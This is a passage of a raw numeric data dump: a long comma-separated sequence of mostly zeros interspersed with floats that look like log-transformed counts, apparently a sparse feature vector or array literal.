0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 3.649511027115099, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 4.518263445217986, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 4.6913478822291435, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 3.178053830347946, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.969640753475787, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.0301047650807, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.160336650881089, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0,\n 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 3.970291913552122, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.9459101490553132, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.8903717578961645, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.8398715690385097, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.58351893845611, \n 3.649511027115099, 0, 3.2188758248682006, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, \n 4.553876891600541, 0.0, 1.0986122886681098, 0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.4849066497880004, 0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.6931471805599453, 0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 1.7412592803704001, 3.8918202981106265, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0, 3.9384838577066197, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 5.0301047650807, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 7.330408475910399, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.679743138077019, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 1.3862943611198906, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 